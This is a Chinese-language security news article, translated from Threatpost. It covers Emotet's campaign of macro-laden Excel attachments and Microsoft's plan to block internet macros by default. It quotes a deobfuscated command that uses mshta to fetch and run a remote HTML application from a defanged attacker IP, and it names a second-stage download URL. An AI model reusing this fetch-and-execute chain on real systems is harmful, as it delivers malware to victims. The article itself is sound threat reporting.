目前Emotet通过恶意的Excel文件进行广泛传播 - 嘶吼 RoarTalk – 网络安全行业综合服务平台,4hou.com

目前Emotet通过恶意的Excel文件进行广泛传播

星辰大海 恶意软件 2022-02-22 11:50:00
179393
收藏

导语:自12月下旬开始,恶意的电子邮件攻击活动一直很活跃,邮件中含有使用了宏的附件以及经过多层混淆的恶意内容。

研究人员发现,臭名昭著的Emotet恶意软件又一次转换了攻击策略,此次则是通过电子邮件来传播恶意的Excel文件。

Palo Alto网络公司的研究人员观察到了这种恶意软件的全新攻击方式,他们在星期二在线发表的一份报告中写道,众所周知,为避免被检测到,这种恶意软件会修改和改变其攻击载体,这样它就可以继续进行恶意攻击。

研究人员Saqib Khanzada、Tyler Halfpop、Micah Yates和Brad Duncan写道,Emotet的新的攻击链显示,在使用Emotet有效载荷之前,攻击者使用了多种不同类型的文件以及混淆脚本进行攻击。

这种新的攻击媒介在12月21日被发现,现在仍然很活跃。通过使用社会工程学,攻击者使用电子邮件传递一个Excel文件,其中含有混淆的Excel 4.0宏代码。

研究人员写道:"当宏文件运行时,它会下载并执行一个HTML应用程序,该程序会下载PowerShell文件来检索和执行最终的Emotet有效载荷。”

不死的恶意软件

据Check Point软件公司称,Emotet在2014年作为一个银行木马开始进行攻击,并不断发展成为了一个极具威胁性的文件,而且还一度形成了一个僵尸网络,其控制的机器数量超过了150万台。被TrickBot感染的后果是银行账户被接管、巨额的电汇欺诈和勒索软件攻击。

事实上,研究人员说,在其攻击的全盛时期,Emotet造成的损失估计约为25亿美元。

然后,在2021年1月,国际执法部门合作摧毁了一个由数百个僵尸网络服务器组成的网络,Emotet因此而停止了运行。然而,去年11月,在犯罪集团TrickBot的支持下,它又重新出现,现在又成为了一种新的威胁。

自回归以来,Emotet使用了新的攻击方法,比如线程劫持以及其他类型的战术。

研究人员认为,这种技术使用了被Emotet感染的Windows主机的邮件客户端窃取合法邮件来生成伪造回复。

研究人员写道,这种方法主要包括使用链接来安装一个伪造的Adobe Windows应用程序安装包。

使用Excel宏

据安全研究人员称,Emotet使用Excel宏的感染方法也有了几种新的变化。

在某些情况下,Emotet会在电子邮件的附件中添加一个受密码保护的.ZIP文件。研究人员解释说,在其他情况下,Emotet会使用附在电子邮件中的Excel电子表格进行攻击。

研究人员概述了Emotet僵尸网络在1月27日发送的一封电子邮件,其中使用了2021年6月被盗的一个电子邮件中的信息。研究人员写道,该电子邮件使用了一个钓鱼诱饵,名为”供应商的新公告",并在其中附加了一个加密的.ZIP文件,试图以此绕过安全系统。它还提到了电子邮件中的.ZIP文件的密码,因此受害者可以查看其中的内容。

研究人员写道:"加密的.ZIP文件中包含了一个带有Excel 4.0宏的Excel文件。这些宏经常被恶意攻击者滥用。受害者必须在Windows主机上启用宏,才可以执行恶意代码"。

研究人员写道:"一旦受害者这样做了,宏代码就会执行cmd.exe来运行mshta.exe,其功能是检索和执行一个远程的HTML应用程序,下载和执行PowerShell代码。”

他们解释说:"该代码利用了十六进制编码和字符混淆,试图以此来绕过静态检测。去混淆后,程序所执行的命令字符串是:cmd /c mshta http://91.240.118[.]168/se/s.html"。

最初的PowerShell脚本会连接到http://91.240.118[.]168/se/s.png,这个URL会返回一个攻击脚本,该脚本主要用于第二阶段的攻击过程,检索Emotet二进制文件。

第二阶段的PowerShell代码包含了14个URL,该脚本会尝试每个URL,直到成功下载Emotet二进制文件。

研究人员说,在其攻击链中有多个URL,其目的是在其中一个URL失效的情况下保证攻击还可以进行。他们补充说,攻击链的最后阶段Emotet .DLL会从资源部分加载一个加密的PE。

微软将默认阻止Macros

上周,微软宣布了一项在一些应用程序中默认禁用所有宏的计划,同时也承认宏机制是世界上最流行的传递恶意软件的方式之一。

这家计算机巨头指出,为了保护我们的客户,我们需要使那些从互联网上获得的文件中的宏更难以启用,从互联网上获得的VBA宏现在将被默认阻止。

三个流行的Office应用程序,Word、Excel和PowerPoint,加上Access和Visio,都受到了这一计划的影响。

对于从互联网上获得的文件中的宏,用户将不再能够通过点击一个按钮来启用该内容。这种情况下更安全,也将会保证更多用户的安全,包括家庭用户和管理组织中的信息工作者。

从4月下旬开始,将不再有 "启用宏 "的按钮,而是用一个 "了解更多 "的按钮来提示用户,在他们激活文档中的宏之前,他们将会看到更多信息。

本文翻译自:https://threatpost.com/emotet-spreading-malicious-excel-files/178444/如若转载,请注明原文地址
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论

 
本站4hou.com,所使用的字体和图片文字等素材部分来源于原作者或互联网共享平台。如使用任何字体和图片文字有侵犯其版权所有方的,嘶吼将配合联系原作者核实,并做出删除处理。
©2022 北京嘶吼文化传媒有限公司 京ICP备16063439号-1 本站由 提供云计算服务